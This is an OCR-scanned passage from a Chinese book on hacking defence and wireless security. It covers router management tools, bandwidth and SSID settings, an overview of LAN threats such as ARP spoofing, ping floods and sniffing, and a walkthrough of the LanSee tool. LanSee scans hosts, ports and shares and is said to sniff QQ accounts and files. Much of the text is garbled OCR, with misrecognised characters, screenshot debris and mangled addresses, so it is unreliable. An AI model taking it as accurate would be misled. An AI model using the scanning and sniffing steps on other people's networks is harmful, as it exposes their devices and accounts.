路 白 时 光 机 宗 带 上 网 em WiFi 密 码 路 由 器 帘 色 至 后 路 由 中 


step 图 选择 “路 由 器 密码 ”选项 卡 ， 进 入 “路 由 器 密码 ”界面 ， 在 其 中 输入 路 由 器 密码 ， 
单 击 “保存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


路 由 器 卫士 我 的 路 由 路 由 防 黑 。 ”路 由 跑 分 
跨 白 时 光 机 , 之 带 上 网 WiFi 密 码 (2) 路 由 踢 密 妈 到 后 路 由 嘴 
\ / 当前 帐号 ;admin 
cm em es | 
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[sep 了 | 选择 “重启 路 由 器 ”选项 卡 ， 进 入 “重启 路 由 器 ”界面 ， 单 击 “ 重 启 ” 按 钮 ， 即 可 
对 当前 路 由 器 进行 重启 操作 ， 如 下 图 所 示 。 


路 由 器 卫士 ” ”和 瑞 鸭 路 由 路 由 防 黑 路 由 跑 分 。 ”扩展 工具 
1 
路 由 时 光 机 宾 带 上 网 WiFi 密 码 路 由 路 密码 、 < ”至 后 路 由 踢 


另外 ， 使 用 360 路 由 器 卫士 在 管理 无 线 网 络 安 全 的 过 程 中 ， 一 旦 检测 到 有 设备 通过 路 
由 器 上 网 ， 就 会 在 计算 机 吕 面 的 右上 角 弹 出 信息 提示 框 ， 如 下 图 所 示 。 


iPhone%... 上 线 了 


单 击 “管理 ”按钮 ， 即 可 打开 该 设备 的 详细 信息 界面 ， 在 其 中 可 以 对 网 速 进行 限制 管 
理 ， 最 后 单 击 “ 确 认 ” 按 钮 即 可 ， 如 下 图 所 示 。 


名 称 iphone%2D6 必 


详细 信息 IP 地址 : 192.168.0.100 


MAKC 地 址 : A4-5E-60-16-/A-A1 


网 速 管理 。 网 于 及 #4 : 


OKB/s 
当前 网 速 


13.3.2 ”路 由 优化 大 师 


路 由 优化 大 师 是 一 款 专 业 的 路 由 器 设置 软件 ， 其 主要 功能 有 一 键 设置 优化 路 由 、 屏 广 
告 、 防 蹄 网 、 路 由 器 全 面 检测 及 高 级 设置 等 ， 从 而 保护 路 由 堪 安全 。 

使 用 路 由 优化 大 师 管理 无 线 网 络 安全 的 操作 步骤 如 下 : 
[sep 国 下 载 并 安装 路 由 优化 大 师 ， 双 击 桌 面 上 的 快捷 图 标 ， 即 可 打开 “路 由 优化 大 师 ” 的 
工作 界面 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


登录 效 由 风 (TP-Link) 


符 理 及 过 码 】 admin 


[st 图 单 直 “登录 ”按钮 ， 打 开 RMTools 窗 口 ， 在 其 中 输入 管理 员 密码 ， 如 下 图 所 示 。 


@ RMTools 一 口 * 
站 管理 区 本 
TL-WR886N 


管理 员 密 码 


[step 图 单 去 “确定 ”按钮 ， 即 可 进入 路 由 器 工作 界面 ， 在 其 中 可 以 看 到 主人 网 络 和 访客 网 


络 信 息 ， 如 下 图 所 示 。 


LT 后 R | 关 问 JREBR: ws 1La 内 
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单 击 “设备 管理 ”图 标 ， 进 入 “设备 管理 ”工作 界面 ， 在 其 中 可 以 看 到 当前 无 线 网 
络 中 的 连接 设备 ， 如 下 图 所 示 。 


全 RMTools 一 口 x 
别 新 | 后 迟 | | 关闭 ”路由 管理 URL: |http:Ni92.158.0.1/ | 国王 EE 
TL-WRABSN 


实时 网 来 : 上 行 OKB/s 下 行 OKB/s 


网 结 科技 医 训 主机 


所 时 了 网 还 : 上 行 OKB/s 下 行 0KB/s 儿 于 网 于 : 上 行 OKB/s 下 行 0KB/s 


匿名 主机 


实 于 网 到 : 上 行 OKB/s 下 行 0KB/s 实时 网 训 : 上 行 2KB/s 下 行 12KB/s 


管理 咯 由 更 方便 。 


> 


如 果 想 要 对 某 个 设备 进行 管理 ， 则 可 以 单 击 “ 管 理 ” 按 钮 ， 进 入 该 设备 的 管理 界 
面 ， 在 其 中 可 以 设置 设备 的 上 传 速 度 、 下 载 速度 以 及 上 网 时 间 等 信息 ， 如 下 图 所 示 。 
| HUAWEI MAIMANG 5 
IP : 192.168.0.103 | MAC : 84-be-52-3b-17-01 | 无 续 连 接 


@ OKB/s @ OKB/s 


上 传 速度 无 限制 下 载 速 度 无 限制 


网 时 间 设 置 


+ 漆 加 允许 上 网 时 间 段 


[step 较 单 击 “ 添 加 允许 上 网 时 间 段 ” 超 链 接 ， 即 可 打开 上 网 时 间 段 的 设置 界面 ， 在 其 中 可 
以 设置 时 间 段 描述 信息 、 开 始 时 间 、 结 束 时 间 等 ， 如 下 图 所 示 。 


aams [EGR 
en [9 7] [本 | 
sa [is [mm | 


ms 


[step 回 单 去 “确定 ”按钮 ， 即 可 完成 上 网 时 间 段 的 设置 操作 ， 如 下 图 所 示 。 
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~ 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


[step 较 单 击 “应 用 管理 ”图 标 ， 即 可 进入 “应 用 管理 ”工作 界面 ， 在 其 中 可 以 看 到 路 由 优 
化 大 师 为 用 户 提供 的 应 用 程序 ， 如 下 图 所 示 。 


访客 网 络 无 线 设备 接 入 控制 
版 本 : 1.1.0 大 小 : 30.8KB 版 本 : 1.0.10 大 小 : 34.7KB 


无 线 桥接 信号 调节 
版 本 : 1.1.2 大 小 : 31.2KB 版 本 : 1.0.14 大 小 


IP 与 MAC 绑 定 管理 员 身 份 限定 
版 本 : 1.0.12 大 小 : 23.9KB 版 本 : 1.0.12 大 小 : 19.9KB 


AP 隔 高 虚拟 服务 总 
版 本 : 1.0.12 大 小 : 9.7KB 版 本 : 1.0.16 大 小 


DDNS DMZ 主 机 


[step 图 如 果 想 要 使 用 某 个 应 用 程序 ， 则 可 以 单 击 菜 应 用 程序 下 的 “进入 ”按钮 ， 进 入 该 应 
用 程序 的 设置 界面 。 本 实例 单 击 “ 无 线 设 备 接 入 控制 ”图 标 ， 如 下 图 所 示 。 


无 线 设备 接 入 控制 


接 入 控制 功能 。” 开启 v 


只 人 允许 列表 内 的 设备 连接 到 主人 网 络 


允许 接 入 设备 列表 


图 主机 MAC 地 址 


请 将 允许 连接 主人 网 络 的 设备 添加 到 列表 当中 。 


sep 了 单 去 “路 由 设置 ”图 标 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 设置 信息 ， 如 下 图 
所 示 。 
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和 RMTools 六 E 
EE ro |] 必 1 杯 | 
NLWRA 


TP-LINIE | TL-WR886N 


路 由 设置 TP-LINK ID 


过 TP-LINK ID S 什么 足 TP-LINK ID ? 


Tp-UNKIC 可 去 全 登录 人 人 Tp-UNK 的 降 户 。 


WT WT 


选择 左 侧 的 “上 网 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 的 上 网 信息 进行 设置 ， 
如 下 图 所 示 。 


二 RMTools — 口 站 


日 二 | | 后 识 | | 美 闭 | 路 由 管理 RL: [htp:W132 158.0.1 || 丸 


TLWRSS6N 


了 工 E2-LERUIKC | TL-WR886N 


基本 设置 


选择 左 侧 的 “无 线 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 无 线 功 能 进行 开关 、 
名 称 、 密 码 等 信息 的 设置 ， 如 下 图 所 示 。 


| @ RMTocls 口 x 


是] IER|| 有 Er: htpWaaoy | 高 | 


TLWRSS6N 


TTP-LINE | TL-WR886N 


路 由 设置 无 线 设 置 
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选择 左 侧 的 “LAN 口 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 LAN 口 进行 设置 ， 
如 下 图 所 示 。 


| @ RMTools 一 品 XX 
剧 呈 后 灌 | | 关闭 | 路 由 管事 JRL: Inttp:/1192, 163.0,1 | a | 保存 
-WRB885N 


TR-LINE |TL-WRSS86N 


路 由 设置 LAN 口 设置 


选择 左 侧 的 “DHCP 服 务 器 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 DHCP 服 务 器 进行 
设置 ， 如 下 图 所 7 


© RMTools 


关闭 | 骨 由 交 ] 台 各 L [http: W192, 158.0. 1/ | 匡 辐 [ 画 ] 


TLAWRSSESN 


下 有 -IT |TL-WR886N 


路 由 设置 DHCP 驱 务 器 


选择 左 侧 的 “软件 升级 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 优化 大 师 的 版 本 进行 升 
级 操作 ， 如 下 图 所 示 。 


| 人 RMTools 


后 退 | | 关闭 | 路 由 筷 体 uRL: |hap*/Pnaz. 153.0.1/ | 区 到 ET 


ML-WRASS5N 


TP-LINIK | TL-WR886N 


路 由 设置 在线 升级 


当前 软件 版 本 ;2.0.2( 


当前 弥 件 版 李 已 是 峡 新 
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选择 左 侧 的 “修改 管理 员 密码 ”选项 ， 在 打开 的 界面 中 可 以 对 管理 员 密码 进行 修改 
设置 ， 如 下 图 所 示 。 


个 RMTools 口 x 
局 5i | | 后 区 | | 关闭 | 路 由 钱 台 RU http:/192,1653.0.1/ | Ga || 保存 | 
TL-WREBGN 


TTP-UINK | TL-WRSS6N 


路 由 设置 修改 管理 员 密码 


~ pe 下 > 
让 ”修改 管理 只 密码 > 


选择 左 侧 的 “备份 和 载 入 配置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 路 由 器 的 配置 进 
行 备 份 和 载 入 设置 ， 如 下 图 所 示 。 


二 RMTools 一 口 x 
[Bi | | 遍 吧 | | 关闭 | 中 由 亚 副 RU jhttp:/1192.158.0.1 | Go || 保存 | 


NL-WRESSN 
TR-ULINIC | TL-WRSB86N 


路 由 设置 备份 


< ”备份 和 载 入 配 否 > 


选择 左 侧 的 “重启 和 恢复 出 厂 ” 选 项 ， 在 打开 的 界面 中 可 以 对 当前 路 由 器 进行 重启 
和 恢复 出 厂 设 置 ， 如 下 图 所 示 。 


全 RMTools 
[ 医 司 | | 帮 剖 | 站 ei: http:W192. 168.0.1/ |][Le@ [4 | 
TLWRS3SSN 


TP-LINK |TL-WR886N 


路 由 设置 重启 路 由 器 


恢复 出 三 设置 


钦 妇 出 厂 设 否 


焦 乱 出 厂 没 互 榨 他 路 宙 问 的 所有 攻 巨 恢 笠 到 宙 ) 


9 禄 全 部 术 秘 . 
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[seo 图 选择 左 侧 的 “系统 日 志 ” 选 项 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 系统 日 志 信 
息 ， 如 下 图 所 示 。 


@rMvoce ox 
ET EE se 


TP-LULINE | TL-WR886N 


路 由 设置 


[step 图 路 由 器 设备 设置 完毕 后 ， 返 回 到 路 由 优化 大 师 的 工作 界面 中 ， 选 择 “ 防 蹦 网 ” 选 
项 ， 在 打开 的 界面 中 可 以 进行 防 蹄 网 设置 ， 如 下 图 所 示 。 


所 有 设备 (3) 。 黑 名 单 (0) 心 


DESKTOP-67NQBIF_- 人 
00-1E-8C-AD-13-5F 


@ AFOIG-611211054 yi 
C8-60-00-9C-CC-D1 


DESKTOP-D5KF15E 192.168.0.107 
58-FB-84-FB-58-10 


[step 图 选择 “ 屏 广 告 ” 选 项 ， 在 打开 的 界面 中 可 以 设置 视频 过 滤 广 告 是 否 开 启 ， 如 下 图 所 示 。 


视频 过 法 广告 未 开启 


打开 闹 频 过 这 广告 后 ,使 用 电脑 五 视频 ,不 会 出 现 广 告 ! 
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[step 图 单 击 “ 开 局 广告 过 滤 ” 按 钮 ， 即 可 开局 视频 过 滤 广 告 功能 ， 如 下 图 所 示 。 


A 


视频 过 滤 广 告 已 开启 


打开 视 髓 过 站 广告 厂 ， 使 用 电脑 吉 视 频 ， 不 会 出 现 广告 ! 


视频 过 渡 广 告 已 开启 


打开 视频 过 浊 广 告 后 ， 使 用 电脑 吞 视频 ， 不 会 出 现 广告 ! 


4USERPROFILE96\Local Se 二 gs\Ar plicatior Data\3650Chrome\Chrome\User Data\Defauk\Ca he\*.* 


[step 图 选择 “ 测 网 速 ” 选 项 ， 进 入 网 速 测试 设置 界面 ， 如 下 图 所 示 。 


启 由 优化 过 f 


p 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


单 击 “开启 测速 ”按钮 ， 即 可 对 当前 网 络 进 行 测 速 操 作 ， 测 出 来 的 结果 显示 在 工作 
界面 中 ， 如 下 图 所 示 。 


1M 4M 10M 20M SOM 100M 200M 1000M 


最 大 接 入 速度 为 326.34MB/ 秒 ， 相 当 于 50M ~ 100M 的 带宽 


立即 ji 富 


13.4 ”实战 演练 


在 无 线 局 域 网 中 所 有 的 终端 设备 都 是 通过 路 由 器 上 网 的 ， 为 了 更 好 地 管理 各 个 终端 设 
备 的 上 网 情况 ， 管 理 员 可 以 通过 路 由 器 控制 上 网 设备 的 上 网 速度 ， 有 具体 的 操作 步骤 如 下 。 
[step 国 打开 路 由 器 的 Web 后 人 台 设 置 界面 ， 在 其 中 选择 “IP 宽 带 控制 ”选项 ， 在 右 侧 的 窗 格 
中 可 以 查看 相关 的 功能 信息 ， 如 下 图 所 示 。 


x 甘 


| 192.168.0.1 


TP-LINIK 上 广 一 的 站 玫 线束 率 一 习 现 无 线 自由 连 巷 要 本 


芋 行 撕 杰 
设置 向 导 
ee 5 开启 与 关 半生 ”只有 7 宙 刘 I 抽 开关 为 和， 大 R09 “7 二 


二 72; 文 ， 刚 失 效 bo 
无 2 以 效 ! 尽 文 ， 刚 上 失 沉 


IC 服务 从 注意 : 
1 带宽 的 护 算 关系 为 : 1Mbpz = 1024Xbpe; 
2. Ra 
世 商 13 电信、 了 网 盟 竺 ) 
3. 修改 下 面 的 本 音 顺 后 ， 请 点 击 “保存 控 钥 ， 全 各 而 和 让 。 


口 开 启 焉 带宽 税制 


帘 共 寺中 类 型; 
上 行 总 帝 宽 : 
下 行 总 带宽 : 


EE 


ET 
请 点 击 查看 >》 下 生计 my 


涿 加 新 革 目 


选中 “开局 IP 宽 带 控制 ” 复 选 框 ， 即 可 在 下 方 的 设置 区 域 中 对 设备 的 上 行 总 宽带 和 
pep ee ee ee 端 设置 的 上 网 速度 ， 如 下 图 所 示 。 


pp 
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回 TL-WR885N X 二 一 口 x 


€ > © | wt 太 | 三 次 
中 本 几 史 线 评 索 一 实现 无 线 自由 连 检 获 想 


a 


页 对 工 带 宽 控 制 的 开户 与 天 闭 进 行 设置 。 只 有 了 带宽 控 相 提 ] 总 开关 为 开户 时 ， 后 续 的 “IE 带宽 控 刨 规则 ”才能 部 
葡 ; 尺 禄 :网 | 站 获 。 


注意 : 
1、 荣 宽 的 换算 关系 为 : iMbps = 102 钼 bpz; 
2、 远 择 席 市 续 暗 基 型 及 质 与 市 帝 太 ,| 二 请 根据 买 际 情 儿 进行 选择 初 填 与 ， 如 不 清 基 ， 请 咨 词 您 的 况 市 提 
家 卡 控 浊 | 世 商 《如 电信 、 交通 等 ) ; 
me 3、 修改 下 面 的 陆 孟 项 后 ;请 点 击 “ 保 存 ” 按 时， 使 凶 孟 项 生 获 。 


路 由 功能 开启 IP 带 亮 控制 
pe 宽带 线路 类 型 ADSI 绑 隐 ”~ 
i 上 行 总 带 帘 : [512 | Kbps 
下 行 总 党 帝 ; Kbpz 


上 行营 帘 IKbp:) 下 行 尘 高 (Kbr=) 
Tp 二 | 上行 带宽 Kbps)_ 
I 


当前 列 夸 为 空 


漆 加 新 池上 月 | 册 际 所 有 硅 月 


实战 演练 2 一 一 通过 修改 WiFi 名 称 隐藏 路 由 器 

WiFi 的 名 称 通常 是 指 路 由 器 当中 SSID 号 的 名 称 ， 该 名 称 可 以 根据 自己 的 需要 进行 修 
改 ， 从 而 可 以 在 一 定 程度 上 隐藏 路 由 器 ， 有 具体 的 操作 步骤 如 下 。 
打开 路 由 器 的 Web 后 台 设置 界面 ， 在 其 中 选择 “无 线 设置 ”选项 下 的 “基本 设置 ” 
选项 ， 打 开 “ 无 线 网 络 基本 设置 ”工作 界面 ， 如 下 图 所 示 。 


回 TL-WR885N xX 


-= | 192.168.0.1 


TP-LINK 和 和 川 大 线 谏 率 汪 实现 无 线 自 由 连接 正 想 


a 


运行 状态 


无 线 网 缩 基 本 设置 
设置 器 号 
网 络 参 数 本 页 面 设置 路 由 器 无 线 网 络 的 基本 区 数 。 


无 线 充 站 ssIDS: 

元 线 安全 设 二 模式 : 1lbgn mixed 

es pe 开启 无 线 功 能 
开启 SSID 广 播 


DHCP 有 服务器 
转发 规则 开启 wns 


安全 功能 
家 长 控制 
上 了 鸯 控制 
路 由 功能 
IP 市 宽 控 制 


[step 图 将 SSID 号 的 名 称 由 TP-LINK1 修 改 为 WiFi， 最 后 单 击 “保存 ”按钮 ， 即 可 保存 WiFi 
修改 后 的 名 称 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


晶 TL-WR885N x BF 


0 | 192.168.0.1 


TP-LINIK | 一 NN 天 线 谏 率 汪 实现 无 线 自 由 连 榨 正 想 


a 世 


运行 状态 
公 置 同 ] 号 
网 络 参 教 本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 


无 线 设置 SSII 吕 : 


信道 : 
模式 : 
频段 带宽 ; 


无 线 安 全 设置 
无 线 山 C 地 址 过 滤 


无 线 高 级 设置 E 
Se 回 开启 无 线 功能 


DBCpHB 务 .39 开启 8SID 广 播 
转发 规则 中 开启 ms 

安全 功能 

家 长 控制 

上 由 控制 

路 由 功能 

IF 市 宽 控 制 


13.5 “小 试 身 手 


练习 1: 无 线路 由 器 的 基本 设置 。 
练习 2: 无 线路 由 器 的 安全 策略 。 
练习 3: 无 线路 由 安全 管理 工具 的 使 用 。 
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第 14 量 ”无 线 局 域 网 的 安全 防护 


无 线 局 域 网 作为 计算 机 网 络 的 一 个 重要 成 员 已 经 被 广泛 应 用 于 社会 的 各 个 领域 。 目 
前 黑客 利用 各 种 专门 攻击 无 线 局 域 网 工具 对 无 线 局 域 网 进行 攻击 ， 本 章 介绍 无 线 局 域 网 
的 安全 防护 ， 主 要 包括 无 线 局 域 网 的 查看 、 无 线 局 域 网 的 攻击 、 无 线 局 域 网 安全 辅助 工 
具 等 。 


14.1 无 线 局 域 网 的 安全 介绍 (1) 按 其 采用 的 技术 可 分 为 不 同 的 种 mown 


Ether Net (以 太 网 ) 、FDDI、Token 起 昌吉 


局 域 网 以 实现 企业 信息 资源 共享 或 者 在 无 
线 局 域 网 上 运行 各 类 业务 系统 。 随 着 企业 
无 线 局 域 网 应 用 范围 的 扩大 、 保 存 和 传输 
的 关键 数据 增多 ， 无 线 局 域 网 的 安全 性 问 
题 日 益 突出 。 


14.1.1 无 线 局 域 网 基础 知识 


大 家 日 党 接触 的 办 公 网 络 大 部 分 是 无 
线 局 域 网 ， 如 各 个 企业 、 学 校 、 政 府 机 关 
等 部 门 中 的 网 络 。 无 线 局 域 网 主要 用 于 一 
个 部 门 内 部 ， 常 局 限于 一 个 建筑 物 之 内 。 
在 企业 内 部 利用 无 线 局 域 网 办 公 已 成 为 其 
经 营 官 理 活动 必 不 可 少 的 一 部 分 。 

无 线 局 域 网 是 指 在 茶 一 区 域内 由 多 人 台 
计算 机 互联 成 的 计算 机 组 ， 一 般 是 方圆 几 
十 米 。 无 线 局 域 网 把 个 人 计算 机 、 工 作 站 
和 服务 器 连 在 一 起 ， 在 无 线 局 域 网 中 可 以 
进行 党 理 文件 、 共 享 应 用 软件 、 共 宇 打 印 
机 、 安 排 工 作 组 内 的 日 程 、 发 送 电 子 邮 件 
和 传真 通信 服务 等 操作 。 无 线 局 域 网 是 封 
闭 型 的 ， 可 以 由 办 公 室 内 的 两 台 计 算 机 组 
成 ， 也 可 以 由 一 个 公司 内 的 数 百 台 计算 机 
组 成 。 

由 于 距离 较 近 ， 传 输 速率 较 快 ， 为 
10 一 1000Mb/s。 无 线 局 域 网 常见 的 分 类 方 
法 有 以 下 几 种 : 


(2) 按 联网 的 主机 间 的 关系 ， 可 分 
为 两 类 ， 如 对 等 网 和 C/S (客户 /服务 
佑 ) 网 。 

(3) 按 使 用 的 操作 系统 不 同 可 分 为 许 
多 种 ， 如 Windows 网 和 Novell 网 。 

无 线 局 域 网 最 主要 的 特点 是 : 网 络 为 
一 个 单位 所 拥有 ， 且 地 理 范 围 和 站 点 数目 
均 有 限 。 无 线 局 域 网 具有 如 下 的 一 些 主要 
优点 : 

(1) 网 内 主机 主要 为 个 人 计算 机 ， 是 
专门 适 于 微机 的 网 络 系统 。 

(2) 禾 瘟 范围 较 小 ， 
联网 。 

(3) 传输 速率 高 ， 误 码 率 低 。 

(4) 系统 扩展 和 使 用 方便 ， 可 共享 昂 
贵 的 外 部 设备 、 软 件 和 数据 。 

(5) 可 靠 性 较 高 ， 适 于 数据 处 理 和 办 
公 目 动 化 。 

无 线 局 域 网 非常 灵活 ， 两 台 计 算 机 就 
可 以 连 成 一 个 无 线 局 域 网 。 无 线 局 域 网 的 
安全 是 内 部 网 络 安全 的 关键， 如 何 保证 无 
线 局 域 网 的 安全 性 成 为 网 络 安全 研究 的 一 
个 重点 。 


适 于 单位 内 部 


14.1.2 无 线 局 域 网 安全 隐患 
随 着 人 类 社会 生活 对 Internet 需 求 的 日 


黑客 攻防 与 无 线 妥 全 从 新 手 到 高 手 〈《 超 值 版 ) 


蔓 增 长 ， 网 络 安全 逐渐 成 为 Internet 及 各 项 
网 络 服务 和 应 用 进一步 发 展 的 关键 问题 。 

网 络 使 用 户 以 最 快速 度 获取 信息 ， 但 是 非 
公开 性 信息 的 被 次 用 和 破坏 ， 是 目前 无 线 
局 域 网 面临 的 主要 问题 。 


1. 无 线 局 域 网 病毒 


在 无 线 局 域 网 中 ， 网 络 病 毒 除 了 具有 
可 传播 性 、 可 执行 性 、 破 坏 性 、 隐 蔽 性 等 
计算 机 病毒 的 共同 特点 外 ， 还 具有 以 下 几 
个 新 特点 : 

(1) 传染 速度 快 。 在 无 线 局 域 网 中 ， 
由 于 通过 服务 器 连接 每 一 台 计 算 机 ， 这 不 
仅 给 病毒 传播 提供 了 有 效 的 通道 ， 而 且 病 
毒 传播 速度 很 快 。 在 正常 情况 下 ， 只 要 网 
络 中 有 一 台 计 算 机 存在 病毒 ， 在 很 短 的 时 
间 内 ， 将 会 寻 致 无 线 局 域 网 内 计算 机 相互 
感染 繁殖 。 

(2) 对 网 络 破坏 程度 大 。 如 果 无 线 局 
域 网 感染 病毒 ， 将 直接 影响 到 整个 网 络 系 
统 的 工作 ， 轻 则 降低 速度 ， 重 则 破坏 服务 
器 重要 数据 信息 ， 甚 至 导致 整个 网 络 系统 
朋 演 。 

(3) 病毒 不 易 清除 。 清 除 无 线 局 域 网 
中 的 计算 机 病毒 ， 要 比 清 除 单机 病毒 复杂 


时 六 汕 渴 得 多 。 无 线 局 域 网 中 只 要 有 一 台 计 算 机 未 


5% 能 完全 消除 病毒 ， 就 可 能 
被 病毒 感染 ， 即 使 刚刚 完成 清除 工作 的 计 


整个 网 络 重 新 


算 机 ， 也 很 有 可 能 立即 被 无 线 局 域 网 中 的 
另 一 台 带 病毒 计算 机 所 感染 。 


2. ARP 了 攻击 


ARP 攻 击 主 要 存在 于 无 线 局 域 网 网 络 
中 ， 对 网 络 安全 和 危害 极 大 。ARP 攻 击 就 
是 通过 伪造 的 IP 地 址 和 MAC 地 址 ， 实 现 
ARP 欺 骗 ， 它 可 以 在 网 络 中 产生 大 量 的 
ARP 通 信 数 据 ， 使 网 络 系统 传输 发 生 阻 
塞 。 如 果 攻 击 者 持续 不 断 地 发 出 伪造 的 
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ARP 啊 应 包 ， 就 能 更 改 目 标 主机 ARP 缓 存 
中 的 IP-MAC 地 址 ， 造 成 网 络 遭 受 攻击 或 
中 断 。 


3. Ping 洪 水 攻击 


Windows 提 供 一 个 Ping 程 序 ， 使 用 它 可 
以 测试 网 络 是 否 连 接 。Ping 洪 水 攻击 也 称 
为 ICMP 入 侵 ， 是 利用 Windows 系 统 的 漏洞 
来 入 侵 的 。 这 种 攻击 方式 也 称 DoS 攻 击 ( 拒 
绝 服务 攻击 ) ， 即 在 一 个 时 段 内 连续 向 服 
务 器 发 出 大 量 请 求 ， 服 务 器 来 不 及 啊 应 而 
死机 。 


4. 嗅 探 


无 线 局 域 网 是 黑客 进行 监听 嗅 探 的 
主要 场所 。 黑 客 在 无 线 局 域 网 内 的 一 个 主 
机 、 网 关上 安装 监听 程序 ， 就 可 以 监听 出 
整个 无 线 局 域 网 的 网 络 状 态 、 数 据 流 动 、 
传输 数据 等 信息 。 因 为 一 般 情况 下 ， 用 户 
的 所 有 信息 ， 例 如 账号 和 密码 ， 都 是 以 明 
文 的 形式 在 网 络 上 传输 的 。 目 前 可 以 在 无 
线 局 域 网 中 进行 嗅 探 的 工具 很 多 ， 例 如 
Sniffer 等 。 


无 线 局 域 网 的 查看 


利用 专门 的 无 线 局 域 网 但 看 工具 可 以 
查看 无 线 局 域 网 中 各 个 主机 的 信息 ， 本 市 
将 介绍 两 款 非 常 方 便 实用 的 无 线 局 域 网 查 
看 工具 。 


14.2 


14.2.1 使 用 LanSee 工 具 


局 域 网 查看 工具 (LanSee) 是 一 款 对 
局 域 网 上 的 各 种 信息 进行 查看 的 工具 。 它 
集成 了 局 域 网 搜索 功能 ， 可 以 快速 搜索 出 
计算 机 (包括 计算 机 名 、IP 地 址 、MAC 
地 址 、 所 在 工作 组 、 用 户 ) 、 共 享 资 源 、 


共享 文件 ， 可 以 捕获 各 种 数据 包 〈TCP、 
UDP、ICMP、ARP) ， 甚 至 可 以 从 流 过 网 
卡 的 数据 中 噢 探 出 QQ 号 码 、 音 乐 、 视 频 、 
图 片 等 账号 、 文 件 。 

使 用 该 工具 查看 无 线 局 域 网 中 各 种 信 
恩 的 具体 操作 步 又 如 下 : 
双击 下 载 的 “局 域 网 查看 工具 ” 程 
序 ， 即 可 打开 “局 域 网 查看 工具 ” 主 窗 
口 ， 如 下 图 所 示 。 


碳 后 项 网 二 二 工 只 (LanSee) V1.72[ 未 注册 ] 一 ”日 * 
设 豆 性 务 吝 五 IV] 洽 位 ”和 关 助 (H) 


工兵 选项 工具 号 示 | 任务 浏览 结束 任务 | 捧 件 答 理 更 新 升级 | 通 出 


执行 浅 程 称 =0 等 华 任 和 效 =0 


在 工具 栏 单 击 “工具 选项 ”按钮 ， 

即 可 打开 “选项 ”对 话 框 ， 选 择 “ 搜 索 计 
算 机 ”选项 ， 在 其 中 设置 扫描 计算 机 的 
起 始 IP 段 和 结束 IP 地 址 段 等 属性 ， 如 下 图 
所 示 。 


当 英 音 口 : 抬 挫 次 口 本 村 ,从 称 : DESKTOP-67NQBIF， 


选项 Xx 
者 搜 索 计 算 机 
万 搜索 共享 文件 IF 地 址 请 口 
的 局 三 凤 聊 天 192 168.1 139 
翁 : 扫 措 端口 192. 168, 1.8 445, . 1024 


IF 地 址 | 端口 
超时 (ms) |2000 | 添加 量 除 清空 
保存 | [ 关闭 ] 


选择 “搜索 共享 文件 2 选项， 在 
其 中 即 可 添加 和 删除 文件 类 型 ， 如 下 图 
所 示 。 
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选项 Xx 


例 扫 措 端口 


六 从 类 型 | | 出 清空 
文件 大 小 亚 以 上 


选择 “局 域 网 聊天 ”选项 ， 在 其 中 可 以 设 
置 聊天 时 使 用 的 用 户 名 和 备注 ， 如 下 图 所 示 。 


选项 x 


击 搜索 计算 机 

姨 搜索 共享 文件 
局 域 网 联 天 

钨 扫 措 端 品 


用 户 宅 |ESKTOF-67N9BIF | 长 度 小 于 16 个 字 节 


备注 “|LanSee 用 户 


长度 小 于 256 个 字 节 


说 明 : 以 上 设置 需要 重新 自动 程序 才能 生效 
品 ] 接收 到 消息 时 声音 提醒 


殿 存 天 闭 


选择 “扫描 端口 ?” 选项 ， 在 其 中 即 可 
设置 扫描 的 卫 地 址 、 端 口 、 超 时 等 属性 ， 设 
置 完 毕 后 单 击 “保存 ”按钮 ， 即 可 保存 各 
项 设置 ， 如 下 图 所 示 。 


选项 XxX 
者 | 搜索 计算 机 
二 搜索 共享 文件 IF 地 址 端口 
逸 局域网 聊天 192. 168.1 139 


扫 朱 端口 192. 168.1.8 445. .1024 


| 端口 | | 


II 地址 | 
超时 ms) |2000 添加 星际 清空 


保生 关闭 


[step 较 在“ 局域网 查看 工具 ” 主 窗口 中 单 去 

“开始 ”按钮 ， 即 可 搜索 出 指定 IP 段 内 的 主 
机 ， 在 其 中 即 可 看 到 各 个 主机 的 了 了 地址 、 计 
算 机 名 、 工 作 组 、MAC 地 址 等 属性 ， 如 下 
图 所 示 。 
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无 线 局 域 网 的 安全 防护 = 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


右 后 项 网 训 志 工 只 (LanSee) V1.72[ 未 注册 ] 一 口 x 
设 豆 性 务 ” 音 五 [V] 泪 傍 ” 交 助 (H) 


6 国 在 “局 域 网 查看 工具 ”中 还 可 以 对 
oA 在 “搜索 工具 ”栏目 


区 了 修 | 膨 疗 


工具 选项 工具 号 示 


任 甸 浏览 纺 率 任务 | 担 


担 件 答 理 更 新 升级 | ” 运 出 
亚 地 址 计 工 机 多 工作 组 MAC 地址 用 户 霹 ee 下 二 主 4 了 次 - 产 ?9》 >» 庆 4 加 4 
192.168.0 1 P4. 93 5. 3 60. 73 共享 由 Y 按 天 Pp 
有 132. 166 .0 1 DEMOF-OTHQEIF WORESEOUT On. IE ac. MD 13 5F 
32. 158.0 1 吧 ISTOF-ECVBST WO3ESEOUT 00. 23.24. 09. ES. E5 全- 设 Se 2 窗 萎 于 一 
重量 192. 158.0 112 0IG-611211054 WOREGHOU7 C38. 51.00. Ke. Cr. D1 共享 由 口 9 P 1、o 
各 132. 153.0. 108 网 站 科技 WORESHOU7 40. 后 .B7. 吧 . .了 3 
Bn snr ss ETN NAS sre wm mr 
< » 
pre see Ss 碳 后 规 网 二 去 工具 (Lansee) V1.72[ 未 注册 ] 一 口 x“ 
至 治 且 在 豚 秆 算 机 至 祥 所 在 的 同 基 人 ^ , 
